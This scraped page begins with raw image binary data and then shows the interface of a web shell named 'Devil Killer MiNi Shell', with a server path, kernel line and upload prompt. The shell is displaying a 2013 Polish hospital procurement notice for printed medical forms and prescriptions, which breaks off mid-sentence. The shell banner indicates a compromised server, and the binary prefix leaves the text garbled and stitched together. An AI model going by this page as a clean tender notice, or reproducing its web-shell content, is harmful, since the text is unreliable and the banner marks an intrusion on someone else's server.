JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131004/403846-N-2013.html

<p class="kh_header"><b>Włocławek: ZP - 35 - 2013,  USŁUGA WYKONANIA DRUKÓW RÓŻNYCH WRAZ Z DOSTAWĄ.</b><br>
<b>Numer ogłoszenia: 403846 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP - 35 - 2013,  USŁUGA WYKONANIA DRUKÓW RÓŻNYCH WRAZ Z DOSTAWĄ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna usługa wykonania druków różnych wraz z dostawą przez okres 12 miesięcy w następującym asortymencie: 
Zadanie 1.  Druki różne:

Nazwa druku	Ilość	Format
 	Historia Choroby	Ogólna        (1 bl  - 100 szt.)	250	A3x2
		Ginekologiczna ( 1 bl -100 szt.)	12	A3
		Karta położnicza ( 1 bl -100 szt.)	50	A3
		Poradni + wkładka ( 1 bl -100 szt.)	100	42cm /15cm +A5x 2
 	Karta Gorączkowa	Ogólna  ( 1 bl -100 szt.)	200	A4 x 2
		Niemowlęcia ( 1 bl -100 szt.)	20	A3 x 2
 	Indywidualna karta zleceń lekarskich ( 1 bl -100 szt.)	200	A4 x 2
 	Karta Indywidualnej Pielęgnacji ( 1 bl -100 szt.)	150	A3 x 2
 	Wkładka do Karty Indywidualnej Pielęgnacji   ( 1 bl -100 szt.)	50	A4 x 2
 	Wkładka do historii choroby ogólna ( 1 bl -100 szt.)	50	A4 x 2
 	Wkładka do historii choroby neurologiczna ( 1 bl -100 szt.)	20	A4 x 2
 	Wkładka do historii choroby neurochirurgiczna ( 1 bl -100 szt.)	5	A3 x 2
 	Wkładka do historii choroby urologiczna ( 1 bl -100 szt.)	10	A3 x 2
 	Wkładka do historii choroby okulistyczna ( 1 bl -100 szt.)	10	A3 x 2
 	Wkładka do historii choroby gin-poł + noworod - przyjęcie do szpitala
 ( 1 bl -100 szt.)	10	A4
 	Karta obserwacji porodu ( 1 bl -100 szt.)	20	A3 x 1
 	Karta obserwacji położnej i lekarza ( 1 bl -100 szt.)	30	A4 x 2
 	Karta statystyczna  szpitalna ogólna ( 1 bl -100 szt.)	170	A4 x 2
 	Karta Przyjęć SAMOKOPIUJĄCA ( 1 bl -100 szt.)	80	A4 x 1
 	Karta cukrzycowa ( 1 bl -100 szt.)	80	A4 x 1
 	Karta obserwacji ( 1 bl -100 szt.)	60	A4 x 1
 	Karta bilansu ( 1 bl -100 szt.)	50	A4 x 1
 	Karta skierowania zwłok do chłodni ( 1 bl -100 szt.)	5	A6 x1
 	Karta sekcyjna ( 1 bl -100 szt.)	3	A6 x 2
 	Karta statystyczna do karty zgonu ( 1 bl -100 szt.)	5	A4 x 2
 	Prośba o zwolnienie z sekcji zwłok ( 1 bl -100 szt.)	3	A4 x 1
 	Karta badania histopatologicznego ( 1 bl -100 szt.)	30	A5 x 2
 	Indywidualna karta rejestracji zakażenia zakładowego ( 1 bl -100 szt.)	30	A4 x 1
 	Karta znieczulenia ( 1 bl -100 szt.)	40	A4 x 1
 	Indywidualna karta obserwacji pacjenta zagrożonego powstaniem odleżyn i podjętych działań profilaktyczno - leczniczych ( 1 bl -100 szt.)	20	A4 x 1
	Indywidualna Karta Obserwacji  Miejsca Operowanego ( 1 bl. - 100 szt.)	30	A4 x 2
	Karta Obserwacji Wkłucia Obwodowego ( 1 bl. -100 szt.)	30	A4x 2
 	Skierowanie do poradni specjalistycznej ( 1 bl -100 szt.)	120	A4 x 1
 	Skierowanie do szpitala ( 1 bl -100 szt.)	100	A4 x 1
 	Skierowanie do Zakładu Radiologii ( 1 bl -100 szt.)	12	A5 x 2
 	Skierowanie na badanie TK ( 1 bl -100 szt.)   SAMOKOPIUJĄCE	80	A4 x 1
 	Skierowanie na badanie MRI ( 1 bl -100 szt.)	10	A4 x 1
 	Skierowanie na badanie grupy krwi ( 1 bl -100 szt.)	20	A5 x 1
 	Zamówienie na krew i jej składniki ( 1 bl -100 szt.)	20	A5 x 1
 	Skierowanie na wykonanie próby zgodności ( 1 bl -100 szt.)	20	A5 x 1
	Wynik próby zgodności krwi ( 1 bl. - 100 szt. )	10	A5 x 1
	Wynik badania grupy krwi  ( 1 bl. - 100 szt. )	10	A5 x 1
 	Zlecenie badania mikrobiologicznego ( 1 bl -100 szt.)	30	A5 x 1
 	Zaświadczenie lekarskie ( 1 bl -100 szt.)	50	A6 x 1
 	Zlecenie na transport sanitarny ( 1 bl -100 szt.)	50	A5 x 1
 	Zestawienie dzienne oddziału ( 1 bl -100 szt.)	40	14cm / 29,5cm x 2
 	Książka	Raportów pielęgniarskich
( 1 książka - 100 kartek)	800	A4
		Operacji  ( 1 książka - 100 kartek)	20	A4
		Przyjęć ambulatoryjnych
( 1 książka - 100 kartek)	40	A4
		Ruchu chorych ( 1 książka - 100 kartek)	50	A4
		Wartości krytycznych badań  laboratoryjnych	5	A4
		Ruchu chorych dla poradni
( 1 książka - 100 kartek)	20	A4
		Transfuzji ( 1 książka - 100 kartek)	20	A4
		Porodów ( 1 książka - 100 kartek)	30	A4
		Ewidencji noworodków
( 1 książka - 100 kartek)	5	A4
		Paszport techniczny	200	A5/ 16 str./
		Księga Inwentarzowa	20	A4
 	Księga Główna Przyjęć do Szpitala ( 1 książka -100 kartek)	10	A3
 	Ewidencja czasu pracy	B ( 1 bl -100 szt.)	80	A4 x 2
 	Wniosek o urlop ( 1 bl -100 szt.)	30	A6 x 2
 	Harmonogram czasu pracy piel./poł./tech. ( 1 bl -100 szt.)	15	14cm / 29,5 cm x 1
 	Magazyn Wyda ( 1 bl -100 szt.) SAMOKOPIUJĄCE	500	A5 x 1
	Przyjęcie środka trwałego OT ( 1bl. - 100 szt.) SAMOKOPIUJĄCE	3	A5 x 1
 	Skierowanie na badania EEG ( 1 bl -100 szt.)	5	A5 x 1
 	Skierowanie na krew do pilnej transfuzji ( 1 bl -100 szt.)	20	A4 x 1
 	Zlecenie na zaopatrzenie w przedmioty ortopedyczne i środki pomocnicze
( 1 bl -100 szt.)	20	A4 x 1
 	Formularz zgłoszenia zachorowania na chorobę zakaźną  ( 1 bl -100 szt.)	5	A4 x 1
 	Karta zgłoszenia nowotworu ( 1 bl -100 szt.)	5	A4 x 2
 	Skierowanie na zabiegi rehabilitacyjne ( 1 bl -100 szt.)	5	A5 x 1
 	Informacja dla lekarza kierującego ( 1 bl -100 szt.)	25	A4 x 1
 	Karta zleceń lekarskich OIOM ( 1 bl -100 szt.)	30	A4 x 2
 	Karta obserwacji OIOM ( 1 bl -100 szt.)	30	A3 x 2
 	Karta zapobiegania i leczenia odleżyn OIOM ( 1 bl -100 szt.)	10	A3 x 2
	Ankieta Anestezjologiczna / Zgoda na wykonanie znieczulenia ( 1 bl. - 100 szt. )	60	A4 x 2
	Informacja O Znieczuleniu ( 1 bl. - 100 szt. )	60	A4 x 1
	Zaświadczenie o pobycie szpitalnym ( 1 bl -100 szt.)	10	A6 x 1
 	Historia rozwoju noworodka ( 1 bl -100 szt.)	30	A4 x 1
 	Karta zdrowia dziecka ( 1 bl -100 szt.)	30	A3 42cm/15 cm x 2
 	Karta uodpornienia ( 1 bl -100 szt.)	30	A4 x 2 karton
 	Historia rozwoju noworodka - poradnia ( 1 bl -100 szt.)	10	A4 x 1
 	Wkładka do historii  rozwoju noworodka - poradnia ( 1 bl -100 szt.)	10	A5 x 2
 	Protokół Operacyjny ( 1 bl -100 szt.)   SAMOKOPIUJĄCY	100	A4
	Protokół Operacyjny SOG ( 1 bl. - 100 szt. )	20	A4 układ poziomy
	Skorowidz do księgi głównej  z alfabetem ( 1 bl. -100 szt.)	15	15 cm x 28 cm
	Dziennik Ruchu Chorych Oddziału ( 1 bl. - 100 szt.)	30	A4
	Księga Oczekujących na przyjęcie do Szpitala ( 1 bl. - 100 szt.)	30	A4
	Karta do skorowidza poradni Zdrowia Psychicznego i Poradni Odwykowej
( 1bl - 100 szt.)	1	10,5 cm x7,5 cm x 2 / karton
	Poradnia ( 1 bl - 100 szt.)	3	10,5 cm x 10 cm x 2/ karton
	Karta ewidencyjna pacjenta poradni  psychiatrycznej / odwykowej
( 1 bl - 100 szt.)	2	A5 x 2
	Zaświadczenie o leczeniu w Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.) SAMOKOPIUJĄCY	30	A4 x 1
	Historia Choroby Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.) SAMOKOPIUJĄCY	4	A3 x2
	Wkładka do Historii Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.)	6	A4 x 2
	Stan Obecny ( 1 bl. - 100 szt.)	4	A3 x 2
	Skierowanie do Pracowni Elektroenecfalograficznej  ( 1 bl. - 100 szt.)	1	A4 x 1
	Skierowanie do Szpitala Psychiatrycznego ( 1bl. - 100 szt.)	4	A4 x 2
	Karta Przebiegu Stosowania Przymusu ( 1 bl. -  100 szt.)	10	A4 x 1
	Skierowanie do Szpitala ( 1 bl. - 100 szt. )	50	A6 x 1
	Oświadczenie pacjenta o zgodzie na badanie ( 1 bl. - 100 szt.)	100	A5 x 1
	Oświadczenie pacjenta o zgodzie na badanie ( dotyczy dziecka )
( 1bl. - 100 szt.)	50	A5x 1
	Wkładka do Historii Choroby  ( 1 bl. - 100 szt.)	100	A5x2
	Informacja dla lekarza kierującego ( 1 bl. - 100 szt.)  SAMOKOPIUJĄCY	200	A4x1
	Zlecenie Badania Mikrobiologicznego ( 1 bl. - 100 szt.)	5	A5 x1
	Skierowanie na badanie RTG/USG ( 1 bl. - 100 szt.)	4	A5x2
	Skierowanie na badanie TK ( 1 bl. - 100 szt.)	2	A4x 2
	Oświadczenie o prawie do św. Op. zdr. Składane przez opiekuna
( 1 bl. - 100 szt.)	4	A4x1
	Oświadczenie o ubezpieczeniu pacjenta ( dziecka) ( 1 bl. - 100 szt.)	2	A4x1
	Zlecenie na transport sanitarny ( 1 bl. - 100 szt.)	2	A4x1
	Karta zlecenia wyjazdu zespołu ratownictwa medycznego ( 1 bl. - 100 szt.)	500	A4
	Karta Medycznych Czynności ratunkowych wzór Nr 1( 1 bl. - 100 szt.)    SAMOKOPIUJĄCE	1000	A4
	Karta Medycznych Czynności ratunkowych wzór Nr 2 ( 1 bl. - 100 szt.)   SAMOKOPIUJĄCE	500	A4
	Zlecenie Wyjazdu ( 1 bl. - 100 szt.)	160	A5x2
	Karta Informacyjna ( 1 bl.- 100 szt.)  SAMOKOPIUJĄCE	30	A5 x1
	Karta Statystyczna do Karty Zgonu ( 1bl. - 100 szt.)	4	A4 x2
	Zgłoszenie Urodzenia Noworodka ( 1 bl. - 100 szt.)	20	A4x2
	Przepustka na wjazd do Szpitala  ( 1 bl. - 100 szt.)	5	8,5 cm x 5,5 cm x 2 / karton kolor niebieski
	Protokół przekazania do CS ( 1 bl- 100 szt.) SAMOKOPIUJĄCE	80	A5
	Protokół przekazania do CS ( 1 bl. - 100 szt.)  SAMOKOPIUJĄCE	50	A4
	Subiektywna globalna ocena stanu odżywiania  ( 1 bl. - 100 szt.)	5	A4 x 1
	Zapotrzebowanie C ( 1 bl. - 100 szt.) SAMOKOPIUJĄCE	200	A5
	Zapotrzebowanie L ( 1 bl. - 100 szt.) SAMOKOPIUJĄCE	150	A4
	Karta wywiadu epidemiologicznego ( 1 bl. - 100 szt.)	250	A4 x1
	Karta kwalifikacji do żywienia pozajelitowego lub dojelitowego / Karta metaboliczna    ( 1 bl. - 100 szt.)	5	A4 x 2
	Karta żywienia pozajelitowego ( 1. bl. - 100 szt.)	5	A4 x 1
	Ocena ryzyka związanego ze stanem odżywienia ( 1 bl. - 100 szt.)	5	A4 x 1
	Konsultacje lekarskie ( 1bl. - 100 szt.) SAMOKOPIUJĄCE	30	A4
	Informacja dla Pacjentki oraz Formularz Świadomej Zgody na Operacyjne Rozwiązanie Ciąży Metodą Ciecia Cesarskiego ( 1 bl. - 100 szt.)	6	A4x2  i A4 x 1
	Przebieg Porodu ( 1 bl. - 100 szt.)	20	A4 x 2
	Zgoda na Zabieg Operacyjny Ginekologiczny  ( 1 bl. - 100 szt.)	20	A4 x 1
	Karta Zabiegu Inwazyjnego ( 1 bl. - 100 szt.)	26	A4x1
	Diagnostyka ( 1 bl. - 100 szt. )	26	A4 x 2
	Świadoma Zgoda Pacjenta na Wykonanie Zabiegu Lekarskiego ( 1 bl. - 100 szt.)	15	A4x2
	Skala NIH/Rankina/Oxfordshire ( 1 bl. - 100 szt.)	6	A4x 2

Legenda:

1.	A3 x 1 - format A3 drukowany jednostronnie,
2.	A4 x 2 - format A4 drukowany dwustronnie,
3.	A5 x 1 - format A5 drukowany jednostronnie,
4.	A6 x 2 -format A6 dwustronnie,
5.	A3 42cm/15 cm x 2 - format A3 długość / szerokość drukowany dwustronnie 


Zadanie 2. RECEPTY:
	
Nazwa druku	Ilość bloczków 	Format
Recepty   ( 1 bl.-100 szt .)	1300	99 mm/ 210mm.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 usługę polegającą na wykonaniu druków wraz z dostawą o wartości minimum 40 000,00 zł brutto w ramach jednego kontraktu.

Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentu wykazu wykonanych, a w przypadku świadczeń okresowych i ciągłych, również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (zał. nr 6 do siwz) oraz dowodów, czy zostały wykonane lub są wykonywane należycie oraz oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy składający ofertę wspólnie, na podstawie art. 23 ustawy Prawo zamówień publicznych (dotyczy m.in. spółki cywilnej i tzw. konsorcjum), zobowiązani są, poza dokumentami wymienionymi wyżej, do złożenia dokumentu ustanawiającego pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagania zawarte w niniejszej specyfikacji dotyczące (wykonawcy) w zakresie obowiązku złożenia stosownych oświadczeń i dokumentów stosuje się odpowiednio do wszystkich wykonawców składających ofertę wspólnie. Jeżeli oferta wykonawców, składających ofertę wspólnie zostanie wybrana, zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku,  gdy:
1)	nastąpi obniżenie ceny;
2)	nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
3)	nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
4)	zmiany terminu obowiązywania umowy, zgodnie z § 8 ust. 3 umowy.
2.  W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie  
    umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili  
    zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od  
    powzięcia wiadomości o powyższych okolicznościach.
3.  W przypadku o którym mowa w ust. 3, Wykonawca może żądać wyłącznie  
